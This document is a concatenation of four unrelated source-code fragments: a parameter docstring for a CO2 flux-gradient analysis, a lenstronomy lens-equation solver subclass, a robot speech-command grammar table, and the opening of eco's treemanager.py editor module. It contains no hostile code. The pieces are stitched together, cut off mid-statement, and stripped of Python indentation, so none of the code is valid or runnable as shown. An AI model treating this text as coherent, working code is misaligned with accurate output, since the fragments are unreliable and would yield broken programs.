flux_lat_range: [float, float]
The latitude range over which to integrate fluxes.
campaign_time_point: string
Acceptable values: ["center", "end"]; where to set the campaign's time-axis value.
bin_aggregation_method: string
Acceptable values: ["mean", "median"]; how to aggregate aircraft data in the θ bins.
fit_groups: iterable
The groups by which to aggegrate campaigns.
model_tracer_list: list of tuples
The models and their tracers to use, i.e. [(CT2017, "CO2_OCN"), (CT2019B, "CO2_OCN"), ...]
dfs_obs: dict
Dictionary of observational data contained in pandas.DataFrame's returned from `load_data`.
dfs_model: dict
Dictionary of simulated observations contained in pandas.DataFrame's returned from `load_data`.
model_groups : dict
A dictionary specifying a grouping of the models; the code returns a model-group-weighted fit.
model_tracer_ext_list : list of tuples
A list of tuples specifying the (model, tracer) pairs to use to estimate "external"
contributions to the observed gradient. I.e., these data are used to correct the
observed estimates of the gradient for land and fossil contributions.
model_list_sfco2_lnd : list of tuples
A list of (model, tracer) pairs used to correct the resulting flux estimate for in-region
land and fossil fuel fluxes. This is only used if the contraint is based on total CO2.
methane_theta_lbound : float
Specifies the θ value above which to relate CH4 and CO2. This is only relevant if
`use_methane_gradient_correction=True`, which is not the case by default. This option
was something we explored, but did not feel it well justified, so did not implement in the
final computation.
use_methane_gradient_correction: boolean
Use vertical gradients of CH4 to correct observed gradient; this option is not scientifically
justified and should not be used.
| |
<reponame>ohannuks/lenstronomy<gh_stars>0
import numpy as np
import lenstronomy.Util.util as util
import lenstronomy.Util.image_util as image_util
from scipy.optimize import minimize
from lenstronomy.LensModel.Solver.epl_shear_solver import solve_lenseq_pemd
from lenstronomy.LensModel.Solver.lens_equation_solver import LensEquationSolver
from numba import njit, jit
import numba.np.extensions
import pylab as plt
__all__ = ['LensEquationSolverGravLens']
@njit
def contains_solution(a,b,c,x):
#da, db, dc = a-x, b-x, c-x
da = a-x
db = b-x
dc = c-x
cross1 = numba.np.extensions.cross2d(da, db)
cross2 = numba.np.extensions.cross2d(db, dc)
cross3 = numba.np.extensions.cross2d(dc, da)
return ((cross1*cross2>0)*(cross2*cross3)>0)
class LensEquationSolverGravLens(LensEquationSolver):
def _test_critical_curve(self, a,b,c, kwargs_lens):
mu0 = self.lensModel.magnification(a[0], a[1], kwargs_lens)
mu1 = self.lensModel.magnification(b[0], b[1], kwargs_lens)
mu2 = self.lensModel.magnification(c[0], c[1], kwargs_lens)
return (mu0*mu1>0)*(mu1*mu2>0)
def _refine_candidate_solution(self, a, b, c, source_a, source_b, source_c, sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels = 10, iteration = 0, delta_map_threshold = 1e-5):
''' Refines the candidate solution recursively
a ---d--- b
\ | /
\ | / <- Splits triangle into two pieces using vector d in the graph here
\ | /
\|/
c
a,b, c are 2D vectors.
Note: Assumes one solution only
'''
v = np.array([a,b,c])
sv= np.array([source_a,source_b,source_c])
dv= np.array([b-a,c-b,a-c])
i0= np.argmax(np.linalg.norm(dv,axis=1))
d = v[i0]+dv[i0]*0.5
source_d = np.array(self.lensModel.ray_shooting(d[0], d[1], kwargs_lens))
x = np.array([sourcePos_x, sourcePos_y])
print("Iteration", iteration, np.linalg.norm(source_d-x))
if iteration >= max_refinement_levels or np.linalg.norm(source_d-x) < delta_map_threshold:
# Found the final solution
return d
if contains_solution(source_d,sv[(i0+2)%3],sv[i0],x) == True:
return self._refine_candidate_solution(d, v[(i0+2)%3], v[i0], source_d, sv[(i0+2)%3], sv[i0], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels, iteration + 1, delta_map_threshold)
if contains_solution(source_d,sv[(i0+2)%3],sv[(i0+1)%3],x) == True:
return self._refine_candidate_solution(d, v[(i0+2)%3], v[(i0+1)%3], source_d, sv[(i0+2)%3], sv[(i0+1)%3], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels, iteration + 1, delta_map_threshold)
else:
plt.plot([sv[0][0],sv[1][0],sv[2][0],sv[0][0]],[sv[0][1],sv[1][1],sv[2][1],sv[0][1]])
plt.scatter(sourcePos_x, sourcePos_y)
plt.show()
print( self._test_critical_curve(sv[0],sv[1],sv[2], kwargs_lens) )
raise ValueError("Solution not found")
def candidate_solutions(self, sourcePos_x, sourcePos_y, kwargs_lens, min_distance=0.1, search_window=10,
verbose=False, x_center=0, y_center=0):
"""
finds pixels in the image plane possibly hosting a solution of the lens equation, for the given source position and lens model, using Keetons's methodology (Keeton, 2001)
:param sourcePos_x: source position in units of angle
:param sourcePos_y: source position in units of angle
:param kwargs_lens: lens model parameters as keyword arguments
:param min_distance: minimum separation to consider for two images in units of angle
:param search_window: window size to be considered by the solver. Will not find image position outside this window
:param verbose: bool, if True, prints some useful information for the user
:param x_center: float, center of the window to search for point sources
:param y_center: float, center of the window to search for point sources
:returns: (approximate) angular position of (multiple) images ra_pos, dec_pos in units of angles, related ray-traced source displacements and pixel width
:raises: AttributeError, KeyError
"""
kwargs_lens = self.lensModel.set_static(kwargs_lens)
# compute number of pixels to cover the search window with the required min_distance
numPix = int(round(search_window / min_distance) + 0.5)
x_grid, y_grid = util.make_grid(numPix, min_distance)
x_grid += x_center
y_grid += y_center
print(np.min(x_grid), np.max(x_grid))
# ray-shoot to find the relative distance to the required source position for each grid point
x_mapped, y_mapped = self.lensModel.ray_shooting(x_grid, y_grid, kwargs_lens)
# Minus out the source position
x_mapped = x_mapped - sourcePos_x
y_mapped = y_mapped - sourcePos_y
# Create du_(ij), du_(i+1j), du_(ij+1), du_(i+1j+1)
x_mapped, y_mapped \
= np.reshape(x_mapped, (numPix, numPix)), np.reshape(y_mapped, (numPix, numPix))
du00 = np.transpose([np.reshape(x_mapped[:-1, :-1], (numPix-1)**2), np.reshape(y_mapped[:-1, :-1], (numPix-1)**2)])
du10 = np.transpose([np.reshape(x_mapped[1:, :-1], (numPix-1)**2), np.reshape(y_mapped[1:, :-1], (numPix-1)**2)])
du01 = np.transpose([np.reshape(x_mapped[:-1, 1:], (numPix-1)**2), np.reshape(y_mapped[:-1, 1:], (numPix-1)**2)])
du11 = np.transpose([np.reshape(x_mapped[1:, 1:], (numPix-1)**2), np.reshape(y_mapped[1:, 1:], (numPix-1)**2)])
# Compute all the cross products between each vector
ucross1 = np.cross(du00, du10)
ucross2 = np.cross(du10, du11)
ucross3 = np.cross(du11, du00)
idx1 = ((ucross1*ucross2>0)*(ucross2*ucross3)>0)
# 10 ucross2 11
# ucross3
# ucross1 ucross3
# ucross3
#
# 00 01
ucross1 = np.cross(du00, du01)
ucross2 = np.cross(du01, du11)
#ucross3 = np.cross(du11, du00)
idx2 = ((ucross1*ucross2>0)*(ucross2*ucross3)>0)
# 10 11
# ucross3
# ucross3 ucross2
# ucross3
#
# 00 ucross1 01
# Combine solutions:
idx = (idx1+idx2)>0
# # Take out all pixels that contain a critical curve:
mu = self.lensModel.magnification(x_grid, y_grid, kwargs_lens)
mu = np.reshape(mu, (numPix, numPix))
mu00 = np.reshape(mu[:-1, :-1], (numPix-1)**2)
mu10 = np.reshape(mu[1:, :-1], (numPix-1)**2)
mu01 = np.reshape(mu[:-1, 1:], (numPix-1)**2)
mu11 = np.reshape(mu[1:, 1:], (numPix-1)**2)
idxmu = (mu00*mu10>0)*(mu10*mu01>=0)*(mu01*mu11>=0)
idx1 = idx1 * idxmu
idx2 = idx2 * idxmu
# Get x, y on the image plane
x_grid, y_grid = np.reshape(x_grid, (numPix, numPix)), np.reshape(y_grid, (numPix, numPix))
# Pixel width
pixel_width = x_grid[1] - x_grid[0]
# Get solutions
x00 = np.transpose([np.reshape(x_grid[:-1, :-1], (numPix-1)**2)[idx1], np.reshape(y_grid[:-1, :-1], (numPix-1)**2)[idx1] ])
x10 = np.transpose([np.reshape(x_grid[1:, :-1], (numPix-1)**2)[idx1], np.reshape(y_grid[1:, :-1], (numPix-1)**2)[idx1] ])
x01 = np.transpose([np.reshape(x_grid[:-1, 1:], (numPix-1)**2)[idx1], np.reshape(y_grid[:-1, 1:], (numPix-1)**2)[idx1] ])
x11 = np.transpose([np.reshape(x_grid[1:, 1:], (numPix-1)**2)[idx1], np.reshape(y_grid[1:, 1:], (numPix-1)**2)[idx1] ])
u00 = du00[idx1]+np.array([sourcePos_x, sourcePos_y])
u01 = du01[idx1]+np.array([sourcePos_x, sourcePos_y])
u10 = du10[idx1]+np.array([sourcePos_x, sourcePos_y])
u11 = du11[idx1]+np.array([sourcePos_x, sourcePos_y])
# Refine solutions:
x_mins, y_mins = [], []
for i in range(len(x00)):
x_refined = self._refine_candidate_solution(x00[i], x10[i], x11[i], u00[i], u10[i], u11[i], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels = 100, iteration = 0, delta_map_threshold = 1e-7)
x_mins.append(x_refined[0])
y_mins.append(x_refined[1])
# Get solutions
x00 = np.transpose([np.reshape(x_grid[:-1, :-1], (numPix-1)**2)[idx2], np.reshape(y_grid[:-1, :-1], (numPix-1)**2)[idx2] ])
x10 = np.transpose([np.reshape(x_grid[1:, :-1], (numPix-1)**2)[idx2], np.reshape(y_grid[1:, :-1], (numPix-1)**2)[idx2] ])
x01 = np.transpose([np.reshape(x_grid[:-1, 1:], (numPix-1)**2)[idx2], np.reshape(y_grid[:-1, 1:], (numPix-1)**2)[idx2] ])
x11 = np.transpose([np.reshape(x_grid[1:, 1:], (numPix-1)**2)[idx2], np.reshape(y_grid[1:, 1:], (numPix-1)**2)[idx2] ])
u00 = du00[idx2]+np.array([sourcePos_x, sourcePos_y])
u01 = du01[idx2]+np.array([sourcePos_x, sourcePos_y])
u10 = du10[idx2]+np.array([sourcePos_x, sourcePos_y])
u11 = du11[idx2]+np.array([sourcePos_x, sourcePos_y])
# Refine solutions:
for i in range(len(x00)):
x_refined = self._refine_candidate_solution(x00[i], x01[i], x11[i], u00[i], u01[i], u11[i], sourcePos_x, sourcePos_y, kwargs_lens, max_refinement_levels = 1000, iteration = 0, delta_map_threshold = 1e-5)
x_mins.append(x_refined[0])
y_mins.append(x_refined[1])
x_mins, y_mins = np.array(x_mins), np.array(y_mins)
# Get the delta_map
du = np.transpose(self.lensModel.ray_shooting(x_mins, y_mins, kwargs_lens))-np.array([sourcePos_x,sourcePos_y])
delta_map = np.sqrt(np.sum(du**2, axis=1))
return x_mins[delta_map<1.e-3], y_mins[delta_map<1.e-3], delta_map[delta_map<1.e-3], pixel_width
def candidate_solutions_recursive(self, sourcePos_x, sourcePos_y, kwargs_lens, min_distance=0.1, search_window=10,
verbose=False, x_center=0, y_center=0, max_recusion=3, iteration=0):
"""
finds pixels in the image plane possibly hosting a solution of the lens equation, for the given source position and lens model, using Keetons's methodology (Keeton, 2001)
:param sourcePos_x: source position in units of angle
:param sourcePos_y: source position in units of angle
:param kwargs_lens: lens model parameters as keyword arguments
:param min_distance: minimum separation to consider for two images in units of angle
:param search_window: window size to be considered by the solver. Will not find image position outside this window
:param verbose: bool, if True, prints some useful information for the user
:param x_center: float, center of the window to search for point sources
:param y_center: float, center of the window to search for point sources
:returns: (approximate) angular position of (multiple) images ra_pos, dec_pos in units of angles, related ray-traced source displacements and pixel width
:raises: AttributeError, KeyError
"""
kwargs_lens = self.lensModel.set_static(kwargs_lens)
# compute number of pixels to cover the search window with the required min_distance
numPix = int(round(search_window / min_distance) + 0.5)
x_grid, y_grid = util.make_grid(numPix, min_distance)
x_grid += x_center
y_grid += y_center
# ray-shoot to find the relative distance to the required source position for each grid point
x_mapped, y_mapped = self.lensModel.ray_shooting(x_grid, y_grid, kwargs_lens)
# Minus out the source position
x_mapped = x_mapped - sourcePos_x
y_mapped = y_mapped - sourcePos_y
# Create du_(ij), du_(i+1j), du_(ij+1), du_(i+1j+1)
x_mapped, y_mapped \
= np.reshape(x_mapped, (numPix, numPix)), np.reshape(y_mapped, (numPix, numPix))
du00 = np.transpose([np.reshape(x_mapped[:-1, :-1], (numPix-1)**2), np.reshape(y_mapped[:-1, :-1], (numPix-1)**2)])
du10 = np.transpose([np.reshape(x_mapped[1:, :-1], (numPix-1)**2), np.reshape(y_mapped[1:, :-1], (numPix-1)**2)])
du01 = np.transpose([np.reshape(x_mapped[:-1, 1:], (numPix-1)**2), np.reshape(y_mapped[:-1, 1:], (numPix-1)**2)])
du11 = np.transpose([np.reshape(x_mapped[1:, 1:], (numPix-1)**2), np.reshape(y_mapped[1:, 1:], (numPix-1)**2)])
# Compute all the cross products between each vector
ucross1 = np.cross(du00, du10)
ucross2 = np.cross(du10, du11)
ucross3 = np.cross(du11, du00)
idx1 = ((ucross1*ucross2>0)*(ucross2*ucross3)>0)
# 10 ucross2 11
# ucross3
# ucross1 ucross3
# ucross3
#
# 00 01
ucross1 = np.cross(du00, du01)
ucross2 = np.cross(du01, du11)
#ucross3 = np.cross(du11, du00)
idx2 = ((ucross1*ucross2>0)*(ucross2*ucross3)>0)
# 10 11
# ucross3
# ucross3 ucross2
# ucross3
#
# 00 ucross1 01
# Combine solutions:
idx = (idx1+idx2)>0
# # Take out all pixels that contain a critical curve:
mu = self.lensModel.magnification(x_grid, y_grid, kwargs_lens)
mu = np.reshape(mu, (numPix, numPix))
mu00 = np.reshape(mu[:-1, :-1], (numPix-1)**2)
mu10 = np.reshape(mu[1:, :-1], (numPix-1)**2)
mu01 = np.reshape(mu[:-1, 1:], (numPix-1)**2)
mu11 = np.reshape(mu[1:, 1:], (numPix-1)**2)
idxmu = (mu00*mu10>0)*(mu10*mu01>=0)*(mu01*mu11>=0)
idx1 = idx1 * idxmu
idx2 = idx2 * idxmu
#
# Get x, | |
2}
{"params": ["Action_take", "Category", "Origin_place", "Rpos","Destiny_place"],
"Action_take": [["take"], [], [], []],
"Category": [[], [], ["category"], []],
"Origin_place": [[], [], ["place"], []],
"Rpos": [["left", "right", "center", "middle_bottom", "top"],[],[],[]],
"Destiny_place": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type get_rpose_object) (params object -Origin_place- -Rpos- -Category-) (step )) " +
"(task (plan user_speech) (action_type deliver_in_position) (params object -Destiny_place-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
####
## Bring from/to storage
###
#$store = put the {object} into the $storage
{"params": ["Action_put", "Object", "Into", "Storage"],
"Action_put": [["put"], [], [], []],
"Object": [[], [], ["item"], []],
"Into": [["into"], [], [], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Object- default_location -Storage- nil) (step )) ",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_put", "Object", "Into", "Special_object","Storage"],
"Action_put": [["put"], [], [], []],
"Object": [[], [], ["item"], []],
"Into": [["into"], [], [], []],
"Special_object": [[], [], ["item"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Object- default_location -Storage- -Special_object-) (step )) ",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$store = pick up a {category} from the {placement} and put it into the $storage
#{"params": ["Action_take", "Category", "Place"],
#"Action_take": [["take"], [], [], []],
#"Category": [[], [], ["category"], []],
#"Place": [[], [], ["place"], []],
#"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Category- -Place-) (step )) ",
#"verbal_confirmation": '',
#"planner_confirmed": '',
#"planner_not_confirmed": ''},
{"params": ["Action_put", "It", "Into", "Storage"],
"Action_put": [["put"], [], [], []],
"It": [["it"], [], [], []],
"Into": [["into"], [], [], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Storage- nil) (step ))",
#"conceptual_dependency":"(task (plan user_speech) (action_type deliver_in_position) (params -Storage-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_put", "It", "Into", "Special_object", "Storage"],
"Action_put": [["put"], [], [], []],
"It": [["it"], [], [], []],
"Into": [["into"], [], [], []],
"Special_object": [[], [], ["item"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Storage- -Special_object-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$findordI = $vbgor to the {room}, $vbfind the {object?}
{"params": ["Action_find", "Category"],
"Action_find": [["find", "look_for", "locate", "spot", "pinpoint"], [], [], []],
"Category": [[], [], ["category"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object -Category-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params default_location) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#No se implemento $findorsI = $vbfind (a | the) {object meta: Robot must place it on the {placement}}
#$takeI = $vbtake the {aobject? meta: Place to } from the {placement}
{"params": ["Action_take", "Category", "Origin_place"],
"Action_take": [["take", "get", "retrieve", "grasp", "pick up"], [], [], []],
"Category": [[], [], ["category"], []],
"Origin_place": [[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object -Category-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params default_location -Origin_place- ) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$takeI = $vbtake the {aobject meta: Robot will find it on the {placement}}
#$place = $vbplace it on the {placement}
#$placeI = $vbplace it to the {placement?}
{"params": ["Action_place", "Place"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Place": [[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type deliver_in_position) (params -Place-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_place", "Room"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Room": [[], [], ["room"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object_place -Room-) (step ))" +
"(task (plan user_speech) (action_type deliver_in_position) (params default_location) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$mvobjI = $vbplace the {object} in the {placement?}
{"params": ["Action_place", "Object", "Room"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Object": [[], [], ["item"], []],
"Room": [[], [], ["room"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object_place -Room-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params -Object- default_location) (step ))" +
"(task (plan user_speech) (action_type deliver_in_position) (params default_location) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$mvobjI = $vbplace a {object? meta: place 3 objects of the same category at {placement 1}} on the {placement 1}
{"params": ["Action_place", "Category", "Place"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Category": [[], [], ["category"], []],
"Place": [[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object -Category-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params default_object default_location) (step ))" +
"(task (plan user_speech) (action_type deliver_in_position) (params -Place-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$findpsI = $vbfind {name meta: {pron sub} is (sitting | standing | lying | waving ) at the {beacon}}
{"params": ["Action_find", "Person"],
"Action_find": [["find", "locate", "spot", "pinpoint", "look_for"], [], [], []],
"Person": [[], [], ["person"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question follow_place_origin -Person-) (step ))" +
"(task (plan user_speech) (action_type find_person_in_room) (params -Person-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$deliverI = $vbdeliver it to {name meta: {pron sub} is (sitting | standing | lying | waving ) at the {beacon}}
{"params": ["Action_deliver", "Person"],
"Action_deliver": [["bring", "deliver", "give", "hand"], [], [], []],
"Person": [[], [], ["person"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question follow_place_origin -Person-) (step ))" +
"(task (plan user_speech) (action_type find_person_in_room) (params -Person-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$singleSpI= (speak | (say something)) {void meta: When asked, reply to the robot: "$whattosay" }
{"params": ["Action_say"],
"Action_say": [["speak", "say"], [], [], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question whattosay nil) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question default question) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#and $vbguide {pron}
{"params": ["Action_guide", "Pron"],
"Action_guide": [["guide", "escort", "take", "lead", "accompany", "conduct"],[],[],[]],
"Pron": [["her", "him", "it"],[],[],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question place_destiny person) (step ))" +
"(task (plan user_speech) (action_type get_object) (params man_guide) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$countobj = tell $repwho how many $countwhat are in the {placement 1}
{"params": ["Action_talk", "Person", "Many", "Category", "Location"],
"Action_talk": [["tell"], [], [], []],
"Person":[["me"],[],[],[]],
"Many":[["many"],[],[],[]],
"Category": [["snacks", "cutlery", "food", "drinks", "tableware", "containers", "fruits", "cleaning_stuff"], [], [], []],
"Location":[[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- nil) (step ))" +
"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_talk", "Person", "Many", "Color", "Object", "Location"],
"Action_talk": [["tell"], [], [], []],
"Person":[["me"],[],[],[]],
"Many":[["many"],[],[],[]],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Object": [[], [], ["item"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_objects) (params -Object- -Location- -Color-) (step ))" +
"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_talk", "Person", "Many", "Color", "Category", "Location"],
"Action_talk": [["tell"], [], [], []],
"Person":[["me"],[],[],[]],
"Many":[["many"],[],[],[]],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Category": [[], [], ["category"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- -Color-) (step ))" +
"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$countobj = count the $countwhat at the {placement 1} and $report
{"params": ["Action_count", "Category", "Location"],
"Action_count": [["count"], [], [], []],
"Category": [["snacks", "cutlery", "food", "drinks", "tableware", "containers", "fruits", "cleaning_stuff"], [], [], []],
"Location":[[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- nil) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_count", "Color", "Object", "Location"],
"Action_count": [["count"], [], [], []],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Object": [[], [], ["item"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_objects) (params -Object- -Location- -Color-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_count", "Color", "Category", "Location"],
"Action_count": [["count"], [], [], []],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Category": [[], [], ["category"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- -Color-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_report", "Person"],
"Action_report": [["inform", "report"], [], [], []],
"Person":[["me"],[],[],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$descobj = describe the objects in the {placement} to $repwho
{"params": ["Action_describe", "Object", "Place", "Person"],
"Action_describe": [["describe"], [], [], []],
"Object": [["objects", "object"], [], [], []],
"Place": [[], [], ["place"], []],
"Person":[["me"],[],[],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type get_object_description) (params object -Place-) (step ))" +
"(task (plan user_speech) (action update_object_location) (params location current_loc)(step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_desc_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$retrieve = $vbdeliver me some {category} from the $storage
{"params": ["Action_deliver", "Person", "Category", "Storage"],
"Action_deliver": [["deliver", "bring", "give"], [], [], []],
"Person":[["me"],[],[],[]],
"Category": [[], [], ["category"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type retrieve_object) (params -Category- -Storage- nil) (step )) ",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_deliver", "Person", "Category", "Special_object","Storage"],
"Action_deliver": [["deliver", "bring", "give"], [], [], []],
"Person":[["me"],[],[],[]],
"Category": [[], [], ["category"], []],
"Special_object": [[], [], ["item"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type retrieve_object) (params -Category- -Storage- -Special_object-) (step | |
<reponame>softdevteam/eco<filename>lib/eco/treemanager.py
# Copyright (c) 2013--2014 King's College London
# Created by the Software Development Team <http://soft-dev.org/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from incparser.incparser import IncParser
from inclexer.inclexer import IncrementalLexer
from treelexer.lexer import LexingError
from incparser.astree import TextNode, BOS, EOS, MultiTextNode
from grammar_parser.gparser import Terminal, MagicTerminal, IndentationTerminal, Nonterminal
try:
import __pypy__
except ImportError:
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QSettings
from export.jruby import JRubyExporter
from export.jruby_simple_language import JRubySimpleLanguageExporter
from export.jruby_javascript import JRubyJavaScriptExporter
from export.simple_language import SimpleLanguageExporter
from utils import arrow_keys, KEY_UP, KEY_DOWN, KEY_LEFT, KEY_RIGHT
from grammars.grammars import lang_dict, Language, EcoFile
from indentmanager import IndentationManager
from export import HTMLPythonSQL, PHPPython, ATerms
from export.cpython import CPythonExporter
from autolboxdetector import IncrementalRecognizer
import math, os
def debug_trace():
'''Set a tracepoint in the Python debugger that works with Qt'''
from PyQt5.QtCore import pyqtRemoveInputHook
# Or for Qt5
#from PyQt5.QtCore import pyqtRemoveInputHook
from pdb import set_trace
pyqtRemoveInputHook()
set_trace()
class FontManager(object):
def __init__(self):
self.fontht = 0
self.fontwt = 0
fontmanager = FontManager()
class NodeSize(object):
def __init__(self, w, h):
self.w = w
self.h = h
class Line(object):
"""Representation of a source code line.
Has a reference to the node at the beginning of that line and stores the
lines width and height values.
"""
def __init__(self, node, height=1):
self.node = node # this lines newline node
self.height = height # line height
self.width = 0 # line width
self.indent = 0 # line indentation
self.ws = 0
def __repr__(self):
return "Line(%s, width=%s, height=%s)" % (self.node, self.width, self.height)
class Cursor(object):
"""Represents the text cursor in the sourcecode view.
Stores the current node next to the cursor, the cursors offset within this
node and the current line number. Can be manipulated by the user through key
presses."""
def __init__(self, node, pos, line, lines):
self.node = node
self.pos = pos
self.line = line
self.lines = lines
self.last_x = 0
self.log = {}
def save(self, version):
self.log[version] = (self.node, self.pos, self.line)
def load(self, version, lines):
(self.node, self.pos, self.line) = self.log[version]
self.lines = lines
def clean_versions(self, version):
for key in list(self.log.keys()):
if key > version:
del self.log[key]
def copy(self):
return Cursor(self.node, self.pos, self.line, self.lines)
def store_last_x(self):
self.last_x = self.get_x()
def restore_last_x(self, text=""):
if text != "" and text[0] == "\r":
self.line += 1
self.move_to_x(len(text) - 1)
else:
self.move_to_x(self.last_x)
def left(self):
node = self.node
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[-1]
if not self.is_visible(node):
node = self.find_previous_visible(node)
if node.symbol.name == "\r":
self.line -= 1
if isinstance(node, BOS):
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox.previous_terminal()
else:
self.node = node
return
if not node is self.node:
